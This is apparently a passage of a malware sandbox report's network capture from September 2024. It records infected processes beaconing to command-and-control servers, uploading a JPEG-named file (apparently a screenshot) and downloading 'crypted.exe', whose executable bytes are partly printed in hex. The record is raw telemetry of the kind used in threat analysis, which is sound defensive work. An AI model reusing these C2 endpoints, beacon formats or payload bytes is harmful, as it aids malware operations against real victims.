Sep 3, 2024 17:14:19.849441051 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 3, 2024 17:14:20.106374979 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.8	49832	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:19.177844048 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:19.955756903 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:19.991286993 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:14:20.262168884 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.8	49833	185.215.113.19	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:19.267030954 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:20.117477894 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:20.190051079 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 32 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 42 35 45 33 32 46 37 45 34 34 31 32 41 37 34 36 35 41 38 45 36 34 44 30 41 41 45 44 39 46 33 43 30 41 30 41 41 39 42 43 32 32 44 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278529C05BEA3669A52777FA6135B5E32F7E4412A7465A8E64D0AAED9F3C0A0AA9BC22DD20FDE4F01730503
Sep 3, 2024 17:14:20.585098982 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.8	49834	185.215.113.19	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:19.267157078 CEST	170	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----OTE1OTM= Host: 185.215.113.19 Content-Length: 91745 Cache-Control: no-cache
Sep 3, 2024 17:14:19.267208099 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 54 45 31 4f 54 4d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------OTE1OTM=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Sep 3, 2024 17:14:19.267252922 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Sep 3, 2024 17:14:19.267276049 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Sep 3, 2024 17:14:19.267302036 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Sep 3, 2024 17:14:19.267324924 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Sep 3, 2024 17:14:19.267349958 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Sep 3, 2024 17:14:19.267369986 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Sep 3, 2024 17:14:19.267396927 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Sep 3, 2024 17:14:19.267415047 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Sep 3, 2024 17:14:19.267440081 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Sep 3, 2024 17:14:21.177000046 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.8	49835	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:20.496498108 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:21.329788923 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.8	49836	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:20.561326027 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:21.344338894 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:21.376912117 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.8	49837	185.215.113.19	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:20.764595985 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.8	49838	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:21.385862112 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.8	49839	185.215.113.19	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:21.510085106 CEST	170	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODUzNjM= Host: 185.215.113.19 Content-Length: 85515 Cache-Control: no-cache
Sep 3, 2024 17:14:21.510085106 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 55 7a 4e 6a 4d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODUzNjM=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Sep 3, 2024 17:14:21.510143042 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Sep 3, 2024 17:14:21.510143042 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Sep 3, 2024 17:14:21.510164022 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Sep 3, 2024 17:14:21.510216951 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Sep 3, 2024 17:14:21.510216951 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Sep 3, 2024 17:14:21.510216951 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Sep 3, 2024 17:14:21.510268927 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Sep 3, 2024 17:14:21.510268927 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Sep 3, 2024 17:14:21.510302067 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49788	188.114.97.3	443	1136	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-03 15:14:02 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: millyscroqwp.shop
2024-09-03 15:14:02 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-03 15:14:02 UTC	806	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:14:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8rc5k56bkejr4domgd7nlkabik; expires=Sat, 28 Dec 2024 09:00:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ONZ6UhJYiZzht1BqTiTbTNQLBJawiG0Uoh5FCnE9f4GmqiQmBzJhuJsmcx42PlZAo77UDxdO9ZHrBpWcH%2B9rzcX%2FZv7a2Cnnyq4YmIyAuUNb0ihD%2FyLgpOS7MkERgsJYriH%2FsQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bd6afeb4ac641e7-EWR alt-svc: h3=":443"; ma=86400
2024-09-03 15:14:02 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-03 15:14:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49794	188.114.96.3	443	1136	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-03 15:14:04 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: locatedblsoqp.shop
2024-09-03 15:14:04 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-03 15:14:04 UTC	551	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:14:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ueu9lbEaCQquQBi3yNnGAMSaTegJJc1V%2BieXRzeb5lKzO%2BCZfzTzIuuSn9dB8C9QArszT8quM3SvmTfO5IvHG9AIF14J1dtGR1vX7kj1T3md1vrvM8xV9n6%2FdPRFRcMiXPnjkkU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bd6affccfc742b1-EWR
2024-09-03 15:14:04 UTC	818	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-03 15:14:04 UTC	1369	IN	Data Raw: 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b Data Ascii: cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cook
2024-09-03 15:14:04 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 36 52 77 64 62 35 61 4a 34 4a 6e 79 33 30 41 67 51 46 55 68 68 6e 70 32 54 42 64 45 4b 2e 7a 53 56 6e 52 5f 78 53 30 6d 65 72 4d 2d 31 37 32 35 33 37 36 34 34 34 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 Data Ascii: <input type="hidden" name="atok" value="6Rwdb5aJ4Jny30AgQFUhhnp2TBdEK.zSVnR_xS0merM-1725376444-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" st
2024-09-03 15:14:04 UTC	849	IN	Data Raw: 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 Data Ascii: m:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a
2024-09-03 15:14:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49798	176.9.8.206	443	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-03 15:14:05 UTC	74	OUT	GET /get/5dfLDESaxz/crypted.exe HTTP/1.1 Host: transfer.adminforge.de
2024-09-03 15:14:06 UTC	885	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:14:06 GMT Server: Transfer.sh HTTP Server Cache-Control: no-store, max-age=2592000 Content-Disposition: attachment; filename="crypted.exe" Content-Length: 320000 Content-Type: application/octet-stream Vary: Range,Referer,X-Decrypt-Password X-Made-With: <3 by DutchCoders X-Remaining-Days: n/a X-Remaining-Downloads: n/a X-Served-By: Proudly served by DutchCoders Expires: Thu, 03 Oct 2024 15:14:06 GMT Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: SAMEORIGIN X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff Referrer-Policy: no-referrer Permissions-Policy: clipboard-read=, clipboard-write= Expect-CT: enforce, max-age=21600 Content-Security-Policy: default-src https: data: 'unsafe-inline' 'unsafe-eval' 'self' wss://transfer.adminforge.de Connection: close
2024-09-03 15:14:06 UTC	7307	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6f 81 d5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d8 04 00 00 08 00 00 00 00 00 00 ce f7 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELof @ @`
2024-09-03 15:14:06 UTC	265	IN	Data Raw: 53 e2 ba d5 ff 53 e7 fa 8d e0 36 fc c9 9b 84 1c 83 b9 e3 cd c8 37 f5 aa 71 67 8c df 81 18 5c b7 2c 76 1f a5 86 97 83 f5 79 47 ae bd 74 f1 f0 e2 21 41 53 39 ef d6 df bf e9 f4 ce b0 b4 58 8d 74 59 61 ce c3 fd 33 0e 85 9f ed ff 74 80 ff b6 e9 95 72 52 d3 65 83 66 82 21 36 96 13 da 29 6c b6 57 8f 0f 91 d3 82 81 76 7a aa bf 48 de 21 61 d7 9e aa 7f 13 4c 5f 12 8c 0e 16 86 48 e6 fb c8 43 5c b9 40 9b 83 fe 20 4b c1 06 a9 f9 ee f5 2e c7 05 24 42 83 bb b3 d0 80 a2 5c 01 03 07 d7 f2 01 7b 3e 5b 5f a2 79 56 16 c5 c0 de fe 12 56 9c 52 37 56 6e 44 a6 85 e9 f5 80 7e cf 76 4b 2c 48 59 17 20 5e bd cd 61 e2 95 4b b5 07 1a 4b 90 06 26 d0 35 fb 12 5c 63 bb 40 5d 47 46 1d 1a b3 b9 93 f2 db 50 4a 8a b7 df c3 22 fe b1 2f 6e 93 75 7f 7f 1d e3 66 4c c0 31 68 a1 7b 71 b9 43 d1 ae Data Ascii: SS67qg\,vyGt!AS9XtYa3trRef!6)lWvzH!aL_HC\@ K.$B\{>[_yVVR7VnD~vK,HY ^aKK&5\c@]GFPJ"/nufL1h{qC
